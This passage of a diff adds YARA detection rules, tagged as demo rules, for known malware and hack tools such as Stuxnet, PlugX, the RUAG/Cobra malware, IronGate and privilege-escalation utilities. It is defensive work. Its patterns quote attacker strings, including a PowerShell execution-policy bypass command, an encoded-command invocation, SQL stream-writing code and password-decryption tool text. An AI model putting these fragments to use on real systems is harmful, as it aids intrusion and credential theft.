+      $s5 = "%SystemRoot%\\inf\\oem6C.PNF" fullword wide
+      $s6 = "@abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @" wide
+      $s7 = "STORAGE#Volume#1&19f7e59c&0&" fullword wide
+      $s8 = "view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMI" ascii
+   condition: 
+      6 of them
+}
+
+rule APT_Stuxnet_s7hkimdb_RID2EC8 : APT DEMO EXE FILE {
+   meta:
+      description = "Stuxnet Sample - file s7hkimdb.dll"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2016-07-09 11:29:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4071ec265a44d1f0d42ff92b2fa0b30aafa7f6bb2160ed1d0d5372d70ac654bd"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "S7HKIMDX.DLL" fullword wide
+      $op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 } 
+      $op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 } 
+      $op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 40KB and $x1 and all of ( $op* ) )
+}
+
+rule Furtim_nativeDLL_RID2D4A : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Furtim malware - file native.dll"
+      author = "Florian Roth"
+      reference = "MISP 3971"
+      date = "2016-06-13 10:25:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii
+      $op0 = { e0 b3 42 00 c7 84 24 ac } 
+      $op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 } 
+      $op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 } 
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 900KB and $s1 or all of ( $op* )
+}
+
+rule Dubnium_Sample_1_RID2D36 : DEMO EXE FILE G0012 MAL {
+   meta:
+      description = "Detects sample mentioned in the Dubnium Report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/AW9Cuu"
+      date = "2016-06-10 10:22:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+      tags = "DEMO, EXE, FILE, G0012, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii
+      $key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule Dubnium_Sample_2_RID2D37 : DEMO EXE FILE G0012 MAL {
+   meta:
+      description = "Detects sample mentioned in the Dubnium Report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/AW9Cuu"
+      date = "2016-06-10 10:22:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+      tags = "DEMO, EXE, FILE, G0012, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ":*:::D:\\:c:~:" fullword ascii
+      $s2 = "SPMUVR" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule Dubnium_Sample_5_RID2D3A : DEMO EXE FILE G0012 MAL {
+   meta:
+      description = "Detects sample mentioned in the Dubnium Report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/AW9Cuu"
+      date = "2016-06-10 10:22:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+      hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+      hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+      tags = "DEMO, EXE, FILE, G0012, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii
+      $s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+}
+
+rule Dubnium_Sample_6_RID2D3B : DEMO EXE FILE G0012 MAL {
+   meta:
+      description = "Detects sample mentioned in the Dubnium Report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/AW9Cuu"
+      date = "2016-06-10 10:23:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+      hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+      hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+      tags = "DEMO, EXE, FILE, G0012, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii
+      $s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii
+      $s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and all of them
+}
+
+rule Dubnium_Sample_7_RID2D3C : DEMO EXE FILE G0012 MAL {
+   meta:
+      description = "Detects sample mentioned in the Dubnium Report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/AW9Cuu"
+      date = "2016-06-10 10:23:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+      hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+      hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+      tags = "DEMO, EXE, FILE, G0012, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii
+      $s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+}
+
+rule Dubnium_Sample_SSHOpenSSL_RID3077 : DEMO EXE FILE G0012 MAL {
+   meta:
+      description = "Detects sample mentioned in the Dubnium Report"
+      author = "Florian Roth"
+      reference = "https://goo.gl/AW9Cuu"
+      date = "2016-06-10 12:41:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+      hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+      hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+      tags = "DEMO, EXE, FILE, G0012, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "sshkeypairgen.exe" fullword wide
+      $s2 = "OpenSSL: FATAL" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 9000KB and all of them
+}
+
+rule SharpCat_RID2A27 : DEMO EXE FILE HKTL {
+   meta:
+      description = "Detects Hack Tool SharpCat_RID2A27 - file SharpCat_RID2A27.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/Cn33liz/SharpCat_RID2A27"
+      date = "2016-06-10 03:56:41"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "96dcdf68b06c3609f486f9d560661f4fec9fe329e78bd300ad3e2a9f07e332e9"
+      tags = "DEMO, EXE, FILE, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "ShellZz" fullword ascii
+      $s2 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+      $s3 = "currentDirectory" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 20KB and all of them
+}
+
+rule RUAG_APT_srsvc_RID2C14 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware used in the RUAG APT case"
+      author = "Florian Roth"
+      reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+      date = "2016-06-09 09:33:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7"
+      hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "SVCHostServiceDll.dll" fullword ascii
+      $s2 = "msimghlp.dll" fullword wide
+      $s3 = "srservice" fullword wide
+      $s4 = "ModStart" fullword ascii
+      $s5 = "ModStop" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) or all of ( $s* ) ) ) or ( all of them )
+}
+
+rule RUAG_APT_Malware_Gen1_RID2E56 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware used in the RUAG APT case"
+      author = "Florian Roth"
+      reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+      date = "2016-06-09 11:10:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4"
+      hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9"
+      hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "too long data for this type of transport" fullword ascii
+      $x2 = "not enough server resources to complete operation" fullword ascii
+      $x3 = "Task not execute. Arg file failed." fullword ascii
+      $x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii
+      $s1 = "peer has closed the connection" fullword ascii
+      $s2 = "tcpdump.exe" fullword ascii
+      $s3 = "windump.exe" fullword ascii
+      $s4 = "dsniff.exe" fullword ascii
+      $s5 = "wireshark.exe" fullword ascii
+      $s6 = "ethereal.exe" fullword ascii
+      $s7 = "snoop.exe" fullword ascii
+      $s8 = "ettercap.exe" fullword ascii
+      $s9 = "miniport.dat" fullword ascii
+      $s10 = "net_password=%s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and ( 2 of ( $x* ) or 8 of ( $s* ) ) ) or ( 12 of them )
+}
+
+rule RUAG_APT_Malware_Gen3_RID2E58 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects malware used in the RUAG APT case"
+      author = "Florian Roth"
+      reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case"
+      date = "2016-06-09 11:10:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4"
+      hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4"
+      hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii
+      $x2 = "\\\\.\\pipe\\sdlrpc" fullword ascii
+      $x3 = "WaitMutex Abandoned %p" fullword ascii
+      $x4 = "OPER|Wrong config: no port|" fullword ascii
+      $x5 = "OPER|Wrong config: no lastconnect|" fullword ascii
+      $x6 = "OPER|Wrong config: empty address|" fullword ascii
+      $x7 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii
+      $x8 = "OPER|Wrong config: no auth|" fullword ascii
+      $x9 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii
+      $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii
+      $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii
+      $s3 = "www.yahoo.com" fullword ascii
+      $s4 = "MSXIML.DLL" fullword wide
+      $s5 = "www.bing.com" fullword ascii
+      $s6 = "%s: http://%s%s" fullword ascii
+      $s7 = "/javascript/view.php" fullword ascii
+      $s8 = "Task %d failed %s,%d" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 6 of ( $s* ) ) ) or ( 10 of them )
+}
+
+rule PlugX_J16_Gen2_RID2BBC : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects PlugX Malware Samples from June 2016"
+      author = "Florian Roth"
+      reference = "MISP 3954"
+      date = "2016-06-08 09:19:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5dff1e086c5191a0bd7ac13466b7a81a87e99e51968df2f32570eb031c537ab4"
+      hash2 = "710326804b78ccd2782abc16354e389f0e36ba9474ebdced17337a13082ac12f"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "XPlugKeyLogger.cpp" fullword ascii
+      $s2 = "XPlugProcess.cpp" fullword ascii
+      $s4 = "XPlgLoader.cpp" fullword ascii
+      $s5 = "XPlugPortMap.cpp" fullword ascii
+      $s8 = "XPlugShell.cpp" fullword ascii
+      $s11 = "file: %s, line: %d, error: [%d]%s" fullword ascii
+      $s12 = "XInstall.cpp" fullword ascii
+      $s13 = "XPlugTelnet.cpp" fullword ascii
+      $s14 = "XInstallUAC.cpp" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 600KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
+}
+
+rule IronGate_APT_Step7ProSim_Gen_RID3173 : APT DEMO EXE FILE GEN MAL {
+   meta:
+      description = "Detects IronGate APT Malware - Step7ProSim DLL"
+      author = "Florian Roth"
+      reference = "https://goo.gl/Mr6M2J"
+      date = "2016-06-04 13:23:01"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0539af1a0cc7f231af8f135920a990321529479f6534c3b64e571d490e1514c3"
+      hash2 = "fa8400422f3161206814590768fc1a27cf6420fc5d322d52e82899ac9f49e14f"
+      hash3 = "5ab1672b15de9bda84298e0bb226265af09b70a9f0b26d6dfb7bdd6cbaed192d"
+      tags = "APT, DEMO, EXE, FILE, GEN, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\obj\\Release\\Step7ProSim.pdb" ascii
+      $s1 = "Step7ProSim.Interfaces" fullword ascii
+      $s2 = "payloadExecutionTimeInMilliSeconds" fullword ascii
+      $s3 = "PackagingModule.Step7ProSim.dll" fullword wide
+      $s4 = "<KillProcess>b__0" fullword ascii
+      $s5 = "newDllFilename" fullword ascii
+      $s6 = "PackagingModule.exe" fullword wide
+      $s7 = "$863d8af0-cee6-4676-96ad-13e8540f4d47" fullword ascii
+      $s8 = "RunPlcSim" fullword ascii
+      $s9 = "$ccc64bc5-ef95-4217-adc4-5bf0d448c272" fullword ascii
+      $s10 = "InstallProxy" fullword ascii
+      $s11 = "DllProxyInstaller" fullword ascii
+      $s12 = "FindFileInDrive" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 50KB and ( $x1 or 3 of ( $s* ) ) ) or ( 6 of them )
+}
+
+rule IronGate_PyInstaller_update_EXE_RID3323 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects a PyInstaller file named update.exe as mentioned in the IronGate APT"
+      author = "Florian Roth"
+      reference = "https://goo.gl/Mr6M2J"
+      date = "2016-06-04 14:35:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "2044712ceb99972d025716f0f16aa039550e22a63000d2885f7b7cd50f6834e0"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "bpython27.dll" fullword ascii
+      $s5 = "%s%s.exe" fullword ascii
+      $s6 = "bupdate.exe.manifest" fullword ascii
+      $s9 = "bunicodedata.pyd" fullword ascii
+      $s11 = "distutils.sysconfig(" ascii
+      $s16 = "distutils.debug(" ascii
+      $s18 = "supdate" fullword ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and all of them
+}
+
+rule Nirsoft_NetResView_RID2E41 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects NirSoft NetResView - utility that displays the list of all network resources"
+      author = "Florian Roth"
+      reference = "https://goo.gl/Mr6M2J"
+      date = "2016-06-04 11:06:41"
+      score = 40
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "83f0352c14fa62ae159ab532d85a2b481900fed50d32cc757aa3f4ccf6a13bee"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "NetResView.exe" fullword wide
+      $s2 = "2005 - 2013 Nir Sofer" wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+
+rule LM_hash_empty_String_RID2F11 : DEMO HKTL {
+   meta:
+      description = "Detects the empty LM hash on disk/in memory/as output from hacking tools"
+      author = "Florian Roth"
+      reference = "-"
+      date = "2016-06-03 11:41:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "500:AAD3B435B51404EEAAD3B435B51404EE:" ascii
+      $s1 = "500:aad3b435b51404eeaad3b435b51404ee:" ascii
+   condition: 
+      1 of them
+}
+
+rule Win_PrivEsc_gp3finder_v4_0_RID30D3 : DEMO EXE FILE HKTL T1068 {
+   meta:
+      description = "Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe"
+      author = "Florian Roth"
+      reference = "http://grimhacker.com/2015/04/10/gp3finder-group-policy-preference-password-finder/"
+      date = "2016-06-02 12:56:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "7d34e214ef2ca33516875fb91a72d5798f89b9ea8964d3990f99863c79530c06"
+      tags = "DEMO, EXE, FILE, HKTL, T1068"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Check for and attempt to decrypt passwords on share" ascii
+      $x2 = "Failed to auto get and decrypt passwords. {0}s/" fullword ascii
+      $x3 = "GPPPFinder - Group Policy Preference Password Finder" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and 1 of ( $x* ) ) or ( all of them )
+}
+
+rule Win_PrivEsc_folderperm_RID2FE9 : DEMO HKTL SCRIPT T1059_001 T1068 T1086 {
+   meta:
+      description = "Detects a tool that can be used for privilege escalation - file folderperm.ps1"
+      author = "Florian Roth"
+      reference = "http://www.greyhathacker.net/?p=738"
+      date = "2016-06-02 12:17:21"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "1aa87df34826b1081c40bb4b702750587b32d717ea6df3c29715eb7fc04db755"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1068, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "# powershell.exe -executionpolicy bypass -file folderperm.ps1" fullword ascii
+      $x2 = "Write-Host \"[i] Dummy test file used to test access was not outputted:\" $filetocopy" fullword ascii
+      $x3 = "Write-Host -foregroundColor Red \"      Access denied :\" $myarray[$i] " fullword ascii
+   condition: 
+      1 of them
+}
+
+rule Win_PrivEsc_ADACLScan4_3_RID2F59 : DEMO HKTL SCRIPT T1059_001 T1068 T1086 {
+   meta:
+      description = "Detects a tool that can be used for privilege escalation - file ADACLScan4.3.ps1"
+      author = "Florian Roth"
+      reference = "https://adaclscan.codeplex.com/"
+      date = "2016-06-02 11:53:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3473ddb452de7640fab03cad3e8aaf6a527bdd6a7a311909cfef9de0b4b78333"
+      tags = "DEMO, HKTL, SCRIPT, T1059_001, T1068, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "<Label x:Name=\"lblPort\" Content=\"Port:\"  HorizontalAlignment=\"Left\" Height=\"28\" Margin=\"10,0,0,0\" Width=\"35\"/>" fullword ascii
+      $s2 = "(([System.IconExtractor]::Extract(\"mmcndmgr.dll\", 126, $true)).ToBitMap()).Save($env:temp + \"\\Other.png\")    " fullword ascii
+      $s3 = "$bolValid = $ctx.ValidateCredentials($psCred.UserName,$psCred.GetNetworkCredential().Password)" fullword ascii
+   condition: 
+      all of them
+}
+
+rule TidePool_Malware_RID2D59 : DEMO EXE FILE G0004 MAL T1085 {
+   meta:
+      description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
+      author = "Florian Roth"
+      reference = "http://goo.gl/m2CXWR"
+      date = "2016-05-24 10:28:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
+      hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
+      hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
+      tags = "DEMO, EXE, FILE, G0004, MAL, T1085"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii
+      $x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide
+      $x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide
+      $x4 = "IEComDll.dat" fullword ascii
+      $s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide
+      $s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
+      $s3 = "network.proxy.socks_port\", " fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) ) ) or ( 4 of them )
+}
+
+rule RUAG_Tavdig_Malformed_Executable_RID3355 : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects an embedded executable with a malformed header - known from Tavdig malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/N5MEj0"
+      date = "2016-05-23 14:43:21"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and uint32 ( uint32 ( 0x3C ) ) == 0x0000AD0B
+}
+
+rule RUAG_Cobra_Malware_RID2DAE : APT DEMO EXE FILE MAL NK {
+   meta:
+      description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
+      author = "Florian Roth"
+      reference = "https://goo.gl/N5MEj0"
+      date = "2016-05-23 10:42:11"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, EXE, FILE, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and $s1
+}
+
+rule RUAG_Bot_Config_File_RID2E58 : APT DEMO FILE MAL {
+   meta:
+      description = "Detects a specific config file used by malware in RUAG APT case"
+      author = "Florian Roth"
+      reference = "https://goo.gl/N5MEj0"
+      date = "2016-05-23 11:10:31"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[CONFIG]" ascii
+      $s2 = "name = " ascii
+      $s3 = "exe = cmd.exe" ascii
+   condition: 
+      uint32 ( 0 ) == 0x4e4f435b and $s1 at 0 and $s2 and $s3 and filesize < 160
+}
+
+rule RUAG_Cobra_Config_File_RID2F1A : APT DEMO FILE MAL NK {
+   meta:
+      description = "Detects a config text file used by malware Cobra in RUAG case"
+      author = "Florian Roth"
+      reference = "https://goo.gl/N5MEj0"
+      date = "2016-05-23 11:42:51"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, MAL, NK"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "[NAME]" ascii
+      $s1 = "object_id=" ascii
+      $s2 = "[TIME]" ascii fullword
+      $s3 = "lastconnect" ascii
+      $s4 = "[CW_LOCAL]" ascii fullword
+      $s5 = "system_pipe" ascii
+      $s6 = "user_pipe" ascii
+      $s7 = "[TRANSPORT]" ascii
+      $s8 = "run_task_system" ascii
+      $s9 = "[WORKDATA]" ascii
+      $s10 = "address1" ascii
+   condition: 
+      uint32 ( 0 ) == 0x4d414e5b and $h1 at 0 and 8 of ( $s* ) and filesize < 5KB
+}
+
+rule RUAG_Exfil_Config_File_RID2F2B : APT DEMO FILE T1020 {
+   meta:
+      description = "Detects a config text file used in data exfiltration in RUAG case"
+      author = "Florian Roth"
+      reference = "https://goo.gl/N5MEj0"
+      date = "2016-05-23 11:45:41"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, FILE, T1020"
+      minimum_yara = "1.7"
+      
+   strings:
+      $h1 = "[TRANSPORT]" ascii
+      $s1 = "system_pipe" ascii
+      $s2 = "spstatus" ascii
+      $s3 = "adaptable" ascii
+      $s4 = "post_frag" ascii
+      $s5 = "pfsgrowperiod" ascii
+   condition: 
+      uint32 ( 0 ) == 0x4152545b and $h1 at 0 and all of ( $s* ) and filesize < 1KB
+}
+
+rule No_PowerShell_RID2C32 : DEMO EXE FILE HKTL SCRIPT T1059_001 T1086 {
+   meta:
+      description = "Detects an C# executable used to circumvent PowerShell detection - file nps.exe"
+      author = "Florian Roth"
+      reference = "https://github.com/Ben0xA/nps"
+      date = "2016-05-21 09:38:51"
+      score = 80
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "64f811b99eb4ae038c88c67ee0dc9b150445e68a2eb35ff1a0296533ae2edd71"
+      tags = "DEMO, EXE, FILE, HKTL, SCRIPT, T1059_001, T1086"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "nps.exe -encodedcommand {base64_encoded_command}" fullword wide
+      $s2 = "c:\\Development\\ghps\\nps\\nps\\obj\\x86\\Release\\nps.pdb" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $s* ) ) ) or ( all of them )
+}
+
+rule GetUserSPNs_VBS_RID2C7E : DEMO HKTL SCRIPT {
+   meta:
